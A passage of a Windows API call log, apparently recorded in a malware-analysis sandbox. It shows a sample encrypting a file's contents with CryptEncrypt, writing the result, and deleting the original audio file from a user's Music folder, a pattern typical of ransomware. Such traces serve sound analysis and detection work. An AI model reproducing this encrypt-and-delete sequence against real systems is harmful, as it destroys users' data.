[0207.994] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.994] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.994] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d1658*, pdwDataLen=0x8cef60*=0x11605, dwBufLen=0x11608 | out: pbData=0x37d1658*, pdwDataLen=0x8cef60*=0x11608) returned 1 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.997] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0207.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.997] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0207.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.997] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0207.997] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.998] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0207.998] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.998] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.998] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.998] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.998] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.005] WriteFile (in: hFile=0x510, lpBuffer=0x38284a8*, nNumberOfBytesToWrite=0x11608, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x38284a8*, lpNumberOfBytesWritten=0x8cf5e4*=0x11608, lpOverlapped=0x0) returned 1 [0208.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.007] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.007] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.007] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.007] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.007] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.007] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.007] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.007] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaad08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.008] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0208.008] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.008] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.008] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.008] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.008] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.008] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.008] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.008] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.008] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.008] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.008] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.008] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.008] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.008] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.010] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.010] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.010] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.010] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.010] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.010] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.010] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.011] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.011] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.011] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.011] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.011] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.011] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.011] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.011] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.011] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.011] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.011] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.011] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.011] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.011] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.011] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.011] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.012] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.012] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.012] CryptReleaseContext (hProv=0xa7ba28, dwFlags=0x0) returned 1 [0208.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.012] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.012] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.012] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.012] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.012] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.012] CloseHandle (hObject=0x524) returned 1 [0208.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.014] CloseHandle (hObject=0x510) returned 1 [0208.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.018] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.018] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.018] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.019] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\pFAB.wav", lpFilePart=0x8cedf4*="pFAB.wav") returned 0x1e [0208.019] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav" (normalized: "c:\\users\\fd1hvy\\music\\pfab.wav")) returned 0x20 [0208.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5adf7910, ftCreationTime.dwHighDateTime=0x1d5c996, ftLastAccessTime.dwLowDateTime=0xc986ec50, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0xc986ec50, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x11605, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pFAB.wav", cAlternateFileName="")) returned 0x9e2078 [0208.019] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav" (normalized: "c:\\users\\fd1hvy\\music\\pfab.wav")) returned 1 [0208.022] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5adf7910, ftCreationTime.dwHighDateTime=0x1d5c996, ftLastAccessTime.dwLowDateTime=0xc986ec50, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0xc986ec50, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x11605, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pFAB.wav", cAlternateFileName="")) returned 0 [0208.022] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x2af0000) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.023] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.023] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0208.023] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, 